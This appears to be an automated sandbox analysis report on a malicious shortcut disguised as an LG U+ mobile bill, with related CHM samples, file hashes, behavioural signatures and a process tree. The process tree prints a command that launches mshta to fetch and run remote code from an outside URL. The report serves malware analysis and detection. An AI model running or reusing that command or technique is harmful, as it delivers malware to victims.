Overview
overview
10Static
static
8LG유플....html
windows7-x64
1LG유플....html
windows10-2004-x64
1LG유플...ml.lnk
windows7-x64
10LG유플...ml.lnk
windows10-2004-x64
10MAIL_20230...02.chm
windows7-x64
10MAIL_20230...02.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Analysis
-
max time kernel
145s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 23:32
Behavioral task
behavioral1
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
MAIL_20230125151802.chm
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
MAIL_20230125151802.chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral7
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
Message.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
Message.chm
Resource
win10v2004-20230220-en
General
-
Target
LG유플러스_이동통신_202208_이_선.html.lnk
-
Size
1KB
-
MD5
eb7a6e3dc8bbc26f208c511ec7ee1d4c
-
SHA1
b259d84f43f10a00edf1eca1c48610490e0aeb4c
-
SHA256
7c248e03cf87ea3d9a207b17925b7fd8998e9a0b462e601d178ff4c1cd9a1708
-
SHA512
b583bf4cd0b31b9961a268cacd1d05c104886487960c03924c3ba07c33aa56743ed9c3d30bc0191c501db5214360612ae0c8721690001fc8a459c06609dc7227
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/3.html
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 8 4012 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1232 wrote to memory of 3308 1232 cmd.exe cmd.exe PID 1232 wrote to memory of 3308 1232 cmd.exe cmd.exe PID 3308 wrote to memory of 4012 3308 cmd.exe mshta.exe PID 3308 wrote to memory of 4012 3308 cmd.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\LG유플러스_이동통신_202208_이_선.html.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start mshta http://attiferstudio.com/install.bak/sony/3.html2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://attiferstudio.com/install.bak/sony/3.html3⤵
- Blocklisted process makes network request